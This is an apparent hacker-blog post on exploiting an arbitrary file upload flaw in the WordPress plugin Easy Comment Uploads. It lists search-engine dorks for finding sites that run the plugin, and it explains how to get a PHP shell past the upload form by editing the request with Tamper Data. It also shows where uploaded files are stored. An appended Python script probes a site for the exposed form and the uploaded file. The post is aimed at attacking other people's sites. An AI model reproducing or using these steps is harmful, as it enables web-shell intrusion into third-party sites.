Wednesday, 15 January 2014

Wordpress: Easy-Comment-Upload




Hello guys, today I'm going to share an arbitrary file upload vulnerability in the WordPress plugin Easy Comment Uploads. I'm not going to write a long tutorial this time, just the important points of the exploit.


Finding Vulnerable Target

Dorks (any of these locates sites with the plugin installed):

    inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
    /wp-content/plugins/easy-comment-uploads/upload-form.php
    Index of /wp-content/plugins/easy-comment-uploads



Exploiting Target

Exploit : the plugin's upload form, reachable directly at /wp-content/plugins/easy-comment-uploads/upload-form.php


You can upload .txt files and images to any site running the plugin. Getting a shell (a .php file) through only works on certain sites: the browser-side form can be bypassed with Tamper Data by editing the multipart request (filename and Content-Type) after it leaves the browser, but whether the file is accepted then depends on the file types the site has configured the plugin to allow.

After you have successfully uploaded your file, it is stored in the standard WordPress uploads directory, sorted by the year and two-digit month of the upload:

/wp-content/uploads/YEAR/MONTH/FILENAME

Example : 

www.site.com/wp-content/uploads/2011/05/bcc.txt
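As an added example (not code from the original post or from the plugin itself), here is a small Python script that ties the two steps together: it checks whether a site exposes the plugin's upload form and works out where a file uploaded in a given month should be reachable. The sample form HTML, the `check_site`/`fetch` helpers and the heuristic used to recognise the form are my own assumptions; the real upload-form.php markup is not shown in the post.

```python
"""Locate the Easy Comment Uploads form on a WordPress site and work out
where an uploaded file will land. Added example, not from the original post."""
import re
import sys
import datetime
import urllib.error
import urllib.request

# Path of the plugin's upload form, as given in the post.
UPLOAD_FORM_PATH = "/wp-content/plugins/easy-comment-uploads/upload-form.php"

# Constructed sample HTML standing in for a live upload-form.php response.
# The real markup is not in the post; this is an assumption made only so
# the detection logic can be exercised offline.
SAMPLE_FORM_HTML = """
<html><body>
<form method="post" enctype="multipart/form-data" action="upload-form.php">
  <input type="file" name="file" />
  <input type="submit" value="Upload" />
</form>
</body></html>
"""


def upload_form_url(base):
    """Build the URL of the plugin's upload form for a site base URL."""
    return base.rstrip("/") + UPLOAD_FORM_PATH


def looks_like_upload_form(html):
    """Heuristic: a multipart form with a file input is present.
    A 200 for upload-form.php alone is not enough; many hosts answer 200
    with a themed 'not found' page, so the body has to be inspected too."""
    lowered = html.lower()
    has_multipart = "multipart/form-data" in lowered
    has_file_input = re.search(r'<input[^>]+type=["\']?file', lowered) is not None
    return has_multipart and has_file_input


def expected_upload_url(base, filename, year=None, month=None):
    """Where WordPress stores an upload: wp-content/uploads/YYYY/MM/FILENAME.
    The month is zero-padded (2011/05) and the date is the upload date,
    so pass year/month explicitly when checking a file uploaded earlier."""
    today = datetime.date.today()
    year = year or today.year
    month = month or today.month
    return "{}/wp-content/uploads/{:04d}/{:02d}/{}".format(
        base.rstrip("/"), year, month, filename)


def fetch(url, timeout=10):
    """GET a URL; return (status, body), or (None, '') on a network error."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def check_site(base, filename=None, year=None, month=None):
    """Report whether the upload form is exposed and, if a filename is
    given, whether that file is reachable in the expected uploads path."""
    result = {"form_url": upload_form_url(base)}
    status, body = fetch(result["form_url"])
    result["form_status"] = status
    result["form_exposed"] = status == 200 and looks_like_upload_form(body)
    if filename:
        result["file_url"] = expected_upload_url(base, filename, year, month)
        status, _ = fetch(result["file_url"])
        result["file_reachable"] = status == 200
    return result


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: {} http://site.example [uploaded-filename]".format(sys.argv[0]))
        sys.exit(1)
    site = sys.argv[1]
    name = sys.argv[2] if len(sys.argv) > 2 else None
    for key, value in check_site(site, name).items():
        print("{:15s} {}".format(key, value))
```

Run it with the site base URL and, optionally, the name of the file you uploaded; the file check assumes the upload happened this month unless you pass the year and month to `check_site`.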


That's all. Hope you understand.

Have a problem? Leave a comment below :D